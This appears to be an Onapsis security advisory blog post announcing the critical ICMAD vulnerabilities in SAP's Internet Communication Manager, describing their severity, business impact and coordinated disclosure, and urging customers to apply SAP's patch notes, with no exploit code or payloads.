As of August 19, 2022, CISA added the ICMAD vulnerability CVE-2022-22536 to its catalog.
The Onapsis Research Labs is on a quest to protect the world’s most critical applications at the center of the global economy. We are constantly researching a wide number of vulnerabilities, exploits, threat actors, and attack methodologies pertaining to business-critical applications such as those from SAP and Oracle. Detailed research from the Onapsis Research Labs throughout 2021 around HTTP Response Smuggling led to the recent discovery of a set of extremely critical vulnerabilities affecting SAP applications actively using the SAP Internet Communication Manager (ICM) component, which we have collectively dubbed ICMAD (Internet Communication Manager Advanced Desync), for short. This discovery will require immediate attention by most SAP customers, given the widespread usage of the vulnerable technology component in SAP landscapes around the world.
Download the Report: Onapsis and SAP Partner to Discover and Patch Critical ICMAD Vulnerabilities
First, let’s provide a quick summary of the SAP Internet Communication Manager (ICM). The ICM is one of the most important components of an SAP NetWeaver application server. This component is present in most SAP products and is a critical part of the overall SAP technology stack, connecting SAP applications with the Internet. One of its core purposes is to serve as the SAP HTTP(S) server, which subsequently means that this service is always present and exposed by default in SAP NetWeaver Java applications and serves as a requirement to run web applications in SAP ABAP (i.e., Web Dynpro). Additionally, the SAP ICM is a building block of the SAP Web Dispatcher, which means that it typically sits between most SAP application servers and its clients (with the “clients” potentially being “the Internet”).
What was discovered? Well, the Onapsis Research Labs identified three severe network exploitable vulnerabilities which could lead to full system takeover, if leveraged by an attacker. Abusing these vulnerabilities could be simple for an attacker as it requires no previous authentication, no necessary preconditions, and the payload can be sent through HTTP(S). The worst of these vulnerabilities was given the highest CVSSv3 score of 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
For this most critical vulnerability, SAP NetWeaver Applications (Java / ABAP) that are reachable through HTTP(S) are potentially vulnerable to this issue as well as any application sitting behind SAP Web Dispatcher. Examples of potentially vulnerable applications include SAP ERP, SAP Business Suite, SAP S/4HANA, and SAP Enterprise Portal to name a few.
ICMAD: Critical, Network-Exploitable Vulnerabilities
This set of critical vulnerabilities, namely CVE-2022-22536, CVE-2022-22532 and CVE-2022-22533, were discovered and reported to SAP by the Onapsis Research Labs. CVE-2022-22536 scored the highest with a CVSSv3 of 10.0. It can be abused to compromise any SAP NetWeaver-based Java or ABAP application with default configurations. What’s most troubling is that this can be achieved using a single request through the commonly exposed HTTP(S) service, and no authentication is required.
The Onapsis Research Labs were able to validate that attackers could use these vulnerabilities in the ICM to exploit and hijack arbitrary SAP user’s requests (including their sessions) and subsequently take over the SAP application. In addition, using the new “HTTP Response Smuggling” techniques first discovered and presented by Onapsis in 2021, attackers could control responses sent by the SAP application and persist the attack. This means that with a single request, an attacker could be able to steal every victim session and credentials in plain text and modify the behavior of the applications.
CVE-2022-22536 is exploitable when an HTTP(S) proxy is sitting in between clients and the backend SAP system, which is the most common scenario for HTTP(S) access in any productive landscape. The Onapsis Research Labs validated that attackers could also exploit CVE-2022-22532, rated with CVSSv3 score of 8.1 in the absence of a proxy. The combination of both vulnerabilities makes it possible to compromise SAP NetWeaver Java systems regardless of the use of proxies. For this reason, these unpatched SAP systems should be considered vulnerable.
The Potential Business Impact
What makes these vulnerabilities especially critical for SAP customers is that the issues are present by default in the ICM component (hence, SAP NetWeaver, S/4HANA, and SAP Web Dispatcher). Furthermore, a number of other facts magnify the risk:
- Detection: It’s challenging to differentiate a malicious request from a perfectly normal, benign request;
- Impact: Exploiting ICMAD could lead to a full system takeover, as well as other confidentiality, integrity, and availability threats to business-critical SAP applications;
- Exploitation: They require no previous authentication, the exploitation is very simple, and no preconditions are necessary; and
- Attack Surface: The payloads can be sent through HTTP(S), affecting a number of core components that are intended to connect SAP systems to the “outside world”.
A simple HTTP request, indistinguishable from any other valid message and without any kind of authentication, is enough for a successful exploitation.
Consequently, this makes it easy for attackers to exploit it and extremely hard for security technology such as firewalls or IDS/IPS to detect (as it does not present a malicious payload).
Due to the wide range of affected SAP applications, it’s easy to project a number of impact scenarios that could challenge, disrupt, or expose an organization based on the intention of any attacking threat actor group. Specific impact, of course, will vary depending on the affected system(s), but successful exploitation of the vulnerabilities could allow an attacker to perform several malicious actions affecting the enterprise. For example
- Hijack of user identities, theft of all user credentials and personal information
- Exfiltration of sensitive or confidential corporate information
- Fraudulent transactions and financial harm
- Change of banking details in a financial system of record
- Internal denial of service attack that disrupts critical systems for the business
It’s worth noting that, at many organizations, SAP applications fall under the purview of specific industry and governmental regulations, as well as financial and other compliance requirements. Unfortunately, this means that the mere presence of known vulnerabilities in SAP applications that could allow unauthenticated, unfettered access may constitute a deficiency in IT controls for data privacy (e.g., GDPR), financial reporting (e.g., SOX), or industry-specific regulations (e.g., PCI-DSS). Any enforced controls that are bypassed via exploitation of these vulnerabilities may cause regulatory and compliance deficiencies over critical areas.
With that in mind, it’s worth connecting with internal risk, compliance, and legal teams in your organization regarding specific regulatory and other compliance requirements that may apply to your organization.
Again, we’re talking about the ability for a malicious actor to potentially achieve full system takeover, so the critical severity shouldn’t be understated or underestimated, especially when one considers both the highly sophisticated attacks continuously observed in the wild by Onapsis Research Labs and the recent research report from Sygnia on Elephant Beetle, a threat actor group that plays a persistent, long attack game, hiding in enterprise infrastructure.
Recommendations from the Onapsis Research Labs
Onapsis and SAP, the global leader in business software, collaborate frequently on security issues and vulnerabilities with the joint objective of securing SAP customers. The Onapsis Research Labs worked in close partnership with the SAP Product Security Response Team (PSRT) to address these issues, providing technical details, proof-of-concept code, and any necessary data to be analyzed by the SAP Security team.
Onapsis would like to extend special thanks to the SAP PSRT for their collaboration and timely response. As a result of this collaboration and the tireless work of the SAP PSRT, SAP was able to release HotNews Security Notes 3123396 and 3123427 as part of their regular monthly Security Patch Day today (February 8, 2022).
Onapsis Research Labs recommends analyzing the impact that the issues described above can have on your landscape (specifically considering if you have SAP systems exposed to the Internet or to untrusted networks) and applying the notes as soon as possible. For additional guidance about available workarounds for these vulnerabilities, SAP customers should check the References and Workarounds section in the corresponding SAP Security Notes.
For our clients, the Onapsis Platform includes vulnerability assessment capabilities, detection rules, and alarms to continuously monitor malicious activity targeting these specific vulnerabilities as well as thousands of others. Those Onapsis clients who have Onapsis Assess and/or Onapsis Defend are already armed with scanning, monitoring, and alerting tools at their disposal to help protect their SAP landscape as of the publish date of this blogpost with the first release of February 2022 (2.2022.021).
Given the criticality of these vulnerabilities, especially in light of our increasingly interconnected world, Onapsis would like to make sure that every SAP customer has the ability to check to see if they are exposed in order to take steps to protect their business-critical SAP applications. As part of our responsible outreach to the global SAP community, the Onapsis Research Labs have created a free vulnerability scanning tool that will allow any SAP customer to scan for applications across their SAP landscape that are affected by these vulnerabilities.
You can download this free application here.
The aforementioned vulnerabilities present a critical risk to all unprotected SAP applications that are not patched with the corresponding SAP Security Notes. Without taking prompt action to mitigate the risk, it’s possible for an unauthenticated attacker to fully compromise any unpatched SAP system in a simple way.
These notes are rated with the highest CVSS scores and affect commonly deployed components in multiple, widely deployed products from SAP. This is partly due to the fact that the affected components, by design, are intended to be exposed to the Internet, thereby greatly increasing the risk that any attacker, with access to the HTTP(S) port of a Java or ABAP system, could take over the applications and, in some circumstances, even the host OS.
Threat intelligence from SAP, CISA, and Onapsis has demonstrated that threat actors have the knowledge, the technology, and the sophistication to launch complex attacks directly against business-critical applications such as SAP. Generally, we see attacks begin within 72 hours of the release of an SAP Security Note. (Recently, Onapsis Research Labs saw Log4j attacks occur within 24 hours of the public disclosure, so the window for defense is small.)
These vulnerabilities potentially offer easy ingress for malicious actors. As a result, SAP and Onapsis believe that all unpatched SAP applications are vulnerable. The U.S. Department of Homeland Security Cybersecurity and Infrastructure Security Agency (CISA) has issued a Current Activity Alert relating to these vulnerabilities. CISA, SAP, and Onapsis strongly advise that all impacted organizations should apply these security notes as soon as possible, prioritizing those affected systems exposed to untrusted networks, such as the Internet.
- For a deeper dive into the ICMAD vulnerabilities, download our threat report.
- Watch Now: SAP and Onapsis Executive Briefing on Critical ICMAD Vulnerabilities
- Onapsis Research Labs created a free vulnerability scanning tool that will allow SAP customers to scan for applications across their SAP landscape that are affected by the ICMAD vulnerabilities.
- If you are not an Onapsis customer, or need more information or assistance to respond to this situation, request a security briefing here.